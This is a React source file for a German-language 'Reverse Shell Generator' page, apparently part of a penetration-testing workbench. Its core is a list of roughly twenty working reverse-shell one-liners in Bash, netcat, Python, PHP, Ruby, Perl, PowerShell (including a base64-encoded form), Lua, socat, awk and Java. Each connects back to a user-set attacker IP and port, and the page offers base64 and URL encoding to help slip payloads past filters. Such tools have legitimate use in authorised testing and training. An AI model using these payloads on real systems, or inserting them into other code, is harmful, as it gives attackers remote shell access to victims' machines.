import React, { useMemo, useState } from 'react';
import {
  Box,
  Chip,
  FormControl,
  Grid,
  IconButton,
  InputLabel,
  MenuItem,
  Paper,
  Select,
  Snackbar,
  TextField,
  ToggleButton,
  ToggleButtonGroup,
  Tooltip,
  Typography,
  useTheme,
} from '@mui/material';
import ContentCopyIcon from '@mui/icons-material/ContentCopy';
import CheckIcon from '@mui/icons-material/Check';
import PageHeader from '../components/common/PageHeader';

// ─── Shell templates ─────────────────────────────────────────

interface ShellTemplate {
  id: string;
  label: string;
  lang: string;
  tags: string[];
  template: (ip: string, port: string) => string;
}

const SHELLS: ShellTemplate[] = [
  {
    id: 'bash-tcp',
    label: 'Bash -i (TCP)',
    lang: 'bash',
    tags: ['Linux'],
    template: (ip, port) => `bash -i >& /dev/tcp/${ip}/${port} 0>&1`,
  },
  {
    id: 'bash-196',
    label: 'Bash 196',
    lang: 'bash',
    tags: ['Linux'],
    template: (ip, port) => `0<&196;exec 196<>/dev/tcp/${ip}/${port}; sh <&196 >&196 2>&196`,
  },
  {
    id: 'bash-udp',
    label: 'Bash UDP',
    lang: 'bash',
    tags: ['Linux'],
    template: (ip, port) => `sh -i >& /dev/udp/${ip}/${port} 0>&1`,
  },
  {
    id: 'nc-e',
    label: 'Netcat -e',
    lang: 'bash',
    tags: ['Linux', 'BSD'],
    template: (ip, port) => `nc -e /bin/sh ${ip} ${port}`,
  },
  {
    id: 'nc-mkfifo',
    label: 'Netcat mkfifo',
    lang: 'bash',
    tags: ['Linux'],
    template: (ip, port) => `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ${ip} ${port} >/tmp/f`,
  },
  {
    id: 'nc-c',
    label: 'Netcat -c',
    lang: 'bash',
    tags: ['Linux'],
    template: (ip, port) => `nc -c sh ${ip} ${port}`,
  },
  {
    id: 'python3',
    label: 'Python3',
    lang: 'python',
    tags: ['Linux', 'Windows'],
    template: (ip, port) =>
      `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ip}",${port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'`,
  },
  {
    id: 'python3-short',
    label: 'Python3 (short)',
    lang: 'python',
    tags: ['Linux'],
    template: (ip, port) =>
      `python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("${ip}",${port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'`,
  },
  {
    id: 'python2',
    label: 'Python2',
    lang: 'python',
    tags: ['Linux'],
    template: (ip, port) =>
      `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ip}",${port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'`,
  },
  {
    id: 'php-exec',
    label: 'PHP exec',
    lang: 'php',
    tags: ['Linux', 'Windows'],
    template: (ip, port) => `php -r '$sock=fsockopen("${ip}",${port});exec("/bin/sh -i <&3 >&3 2>&3");'`,
  },
  {
    id: 'php-proc',
    label: 'PHP proc_open',
    lang: 'php',
    tags: ['Linux', 'Windows'],
    template: (ip, port) =>
      `php -r '$sock=fsockopen("${ip}",${port});$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'`,
  },
  {
    id: 'ruby',
    label: 'Ruby',
    lang: 'ruby',
    tags: ['Linux'],
    template: (ip, port) =>
      `ruby -rsocket -e'f=TCPSocket.open("${ip}",${port}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'`,
  },
  {
    id: 'perl',
    label: 'Perl',
    lang: 'perl',
    tags: ['Linux'],
    template: (ip, port) =>
      `perl -e 'use Socket;$i="${ip}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`,
  },
  {
    id: 'powershell',
    label: 'PowerShell',
    lang: 'powershell',
    tags: ['Windows'],
    template: (ip, port) =>
      `powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('${ip}',${port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`,
  },
  {
    id: 'powershell-b64',
    label: 'PowerShell Base64',
    lang: 'powershell',
    tags: ['Windows'],
    template: (ip, port) => {
      const cmd = `$client = New-Object System.Net.Sockets.TCPClient("${ip}",${port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()`;
      const b64 = btoa(unescape(encodeURIComponent(cmd)));
      return `powershell -e ${b64}`;
    },
  },
  {
    id: 'lua',
    label: 'Lua',
    lang: 'lua',
    tags: ['Linux'],
    template: (ip, port) =>
      `lua -e "require('socket');require('os');t=socket.tcp();t:connect('${ip}','${port}');os.execute('/bin/sh -i <&3 >&3 2>&3');"`,
  },
  {
    id: 'socat',
    label: 'Socat',
    lang: 'bash',
    tags: ['Linux'],
    template: (ip, port) => `socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:${ip}:${port}`,
  },
  {
    id: 'awk',
    label: 'Awk',
    lang: 'bash',
    tags: ['Linux'],
    template: (ip, port) =>
      `awk 'BEGIN {s = "/inet/tcp/0/${ip}/${port}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null`,
  },
  {
    id: 'java',
    label: 'Java',
    lang: 'java',
    tags: ['Linux', 'Windows'],
    template: (ip, port) =>
      `Runtime r = Runtime.getRuntime();\nProcess p = r.exec("/bin/bash -c 'exec 5<>/dev/tcp/${ip}/${port};cat <&5 | while read line; do $line 2>&5 >&5; done'");\np.waitFor();`,
  },
  {
    id: 'xterm',
    label: 'Xterm',
    lang: 'bash',
    tags: ['Linux'],
    template: (ip, port) => `xterm -display ${ip}:${port}`,
  },
];

const ENCODING_OPTIONS = [
  { id: 'none', label: 'None' },
  { id: 'base64', label: 'Base64' },
  { id: 'url', label: 'URL Encode' },
  { id: 'double-url', label: 'Double URL' },
];

const LANG_TAGS = Array.from(new Set(SHELLS.map((s) => s.lang))).sort();
const PLATFORM_TAGS = Array.from(new Set(SHELLS.flatMap((s) => s.tags))).sort();

function applyEncoding(payload: string, encoding: string): string {
  switch (encoding) {
    case 'base64':
      return btoa(unescape(encodeURIComponent(payload)));
    case 'url':
      return encodeURIComponent(payload);
    case 'double-url':
      return encodeURIComponent(encodeURIComponent(payload));
    default:
      return payload;
  }
}

const WorkbenchRevShellPage: React.FC = () => {
  const theme = useTheme();
  const [ip, setIp] = useState('10.10.14.1');
  const [port, setPort] = useState('4444');
  const [langFilter, setLangFilter] = useState<string | null>(null);
  const [platformFilter, setPlatformFilter] = useState<string | null>(null);
  const [encoding, setEncoding] = useState('none');
  const [copiedId, setCopiedId] = useState<string | null>(null);

  const filtered = useMemo(() => {
    return SHELLS.filter((s) => {
      if (langFilter && s.lang !== langFilter) return false;
      if (platformFilter && !s.tags.includes(platformFilter)) return false;
      return true;
    });
  }, [langFilter, platformFilter]);

  const handleCopy = async (id: string, text: string) => {
    try {
      await navigator.clipboard.writeText(text);
      setCopiedId(id);
      setTimeout(() => setCopiedId(null), 2000);
    } catch { /* blocked */ }
  };

  return (
    <Box>
      <PageHeader
        title="Reverse Shell Generator"
        subtitle="One-Click Payloads für Bash, Python, PHP, PowerShell, Ruby, Perl und mehr"
        breadcrumbs={[
          { label: 'Workbench', path: '/workbench' },
          { label: 'Reverse Shell Generator' },
        ]}
      />

      {/* Controls */}
      <Paper sx={{ p: 2.5, mb: 3, borderRadius: 2, display: 'flex', gap: 2, flexWrap: 'wrap', alignItems: 'flex-end' }}>
        <TextField
          label="LHOST (IP)"
          value={ip}
          onChange={(e) => setIp(e.target.value)}
          size="small"
          sx={{ width: 180 }}
        />
        <TextField
          label="LPORT"
          value={port}
          onChange={(e) => setPort(e.target.value)}
          size="small"
          sx={{ width: 100 }}
        />
        <FormControl size="small" sx={{ minWidth: 140 }}>
          <InputLabel>Encoding</InputLabel>
          <Select value={encoding} label="Encoding" onChange={(e) => setEncoding(e.target.value)}>
            {ENCODING_OPTIONS.map((o) => (
              <MenuItem key={o.id} value={o.id}>{o.label}</MenuItem>
            ))}
          </Select>
        </FormControl>

        <Box sx={{ display: 'flex', gap: 1, flexWrap: 'wrap', alignItems: 'center' }}>
          <Typography variant="caption" sx={{ color: theme.palette.text.secondary, mr: 0.5 }}>
            Sprache:
          </Typography>
          <ToggleButtonGroup
            value={langFilter}
            exclusive
            onChange={(_, v) => setLangFilter(v)}
            size="small"
          >
            {LANG_TAGS.map((t) => (
              <ToggleButton key={t} value={t} sx={{ textTransform: 'none', px: 1.5, py: 0.3, fontSize: '0.75rem' }}>
                {t}
              </ToggleButton>
            ))}
          </ToggleButtonGroup>
        </Box>

        <Box sx={{ display: 'flex', gap: 1, flexWrap: 'wrap', alignItems: 'center' }}>
          <Typography variant="caption" sx={{ color: theme.palette.text.secondary, mr: 0.5 }}>
            Plattform:
          </Typography>
          <ToggleButtonGroup
            value={platformFilter}
            exclusive
            onChange={(_, v) => setPlatformFilter(v)}
            size="small"
          >
            {PLATFORM_TAGS.map((t) => (
              <ToggleButton key={t} value={t} sx={{ textTransform: 'none', px: 1.5, py: 0.3, fontSize: '0.75rem' }}>
                {t}
              </ToggleButton>
            ))}
          </ToggleButtonGroup>
        </Box>
      </Paper>

      {/* Shells Grid */}
      <Grid container spacing={2}>
        {filtered.map((shell) => {
          const raw = shell.template(ip || 'IP', port || 'PORT');
          const payload = applyEncoding(raw, encoding);
          const isCopied = copiedId === shell.id;

          return (
            <Grid item xs={12} md={6} key={shell.id}>
              <Paper
                sx={{
                  borderRadius: 2,
                  overflow: 'hidden',
                  transition: 'box-shadow 0.15s',
                  '&:hover': { boxShadow: `0 2px 12px ${theme.palette.primary.main}18` },
                }}
              >
                <Box
                  sx={{
                    display: 'flex',
                    justifyContent: 'space-between',
                    alignItems: 'center',
                    px: 2,
                    py: 1,
                    borderBottom: `1px solid ${theme.palette.divider}`,
                    bgcolor: theme.palette.mode === 'dark' ? 'rgba(255,255,255,0.03)' : 'rgba(0,0,0,0.02)',
                  }}
                >
                  <Box sx={{ display: 'flex', alignItems: 'center', gap: 1 }}>
                    <Typography variant="subtitle2" sx={{ fontWeight: 700 }}>
                      {shell.label}
                    </Typography>
                    {shell.tags.map((tag) => (
                      <Chip
                        key={tag}
                        label={tag}
                        size="small"
                        variant="outlined"
                        sx={{ fontSize: '0.65rem', height: 20 }}
                      />
                    ))}
                  </Box>
                  <Tooltip title={isCopied ? 'Kopiert!' : 'Kopieren'}>
                    <IconButton size="small" onClick={() => handleCopy(shell.id, payload)}>
                      {isCopied ? <CheckIcon fontSize="small" color="success" /> : <ContentCopyIcon fontSize="small" />}
                    </IconButton>
                  </Tooltip>
                </Box>
                <Box
                  sx={{
                    p: 1.5,
                    fontFamily: '"JetBrains Mono", "Fira Code", monospace',
                    fontSize: '0.78rem',
                    lineHeight: 1.5,
                    whiteSpace: 'pre-wrap',
                    wordBreak: 'break-all',
                    maxHeight: 160,
                    overflowY: 'auto',
                    bgcolor: theme.palette.mode === 'dark' ? '#0d1117' : '#f6f8fa',
                    color: theme.palette.mode === 'dark' ? '#c9d1d9' : '#24292f',
                    cursor: 'pointer',
                    userSelect: 'all',
                  }}
                  onClick={() => handleCopy(shell.id, payload)}
                >
                  {payload}
                </Box>
              </Paper>
            </Grid>
          );
        })}
      </Grid>

      {filtered.length === 0 && (
        <Typography sx={{ color: theme.palette.text.secondary, mt: 2 }}>
          Keine Shells für diesen Filter gefunden.
        </Typography>
      )}

      <Snackbar
        open={copiedId !== null}
        autoHideDuration={2000}
        onClose={() => setCopiedId(null)}
        message="In Zwischenablage kopiert"
        anchorOrigin={{ vertical: 'bottom', horizontal: 'center' }}
      />
    </Box>
  );
};

export default WorkbenchRevShellPage;
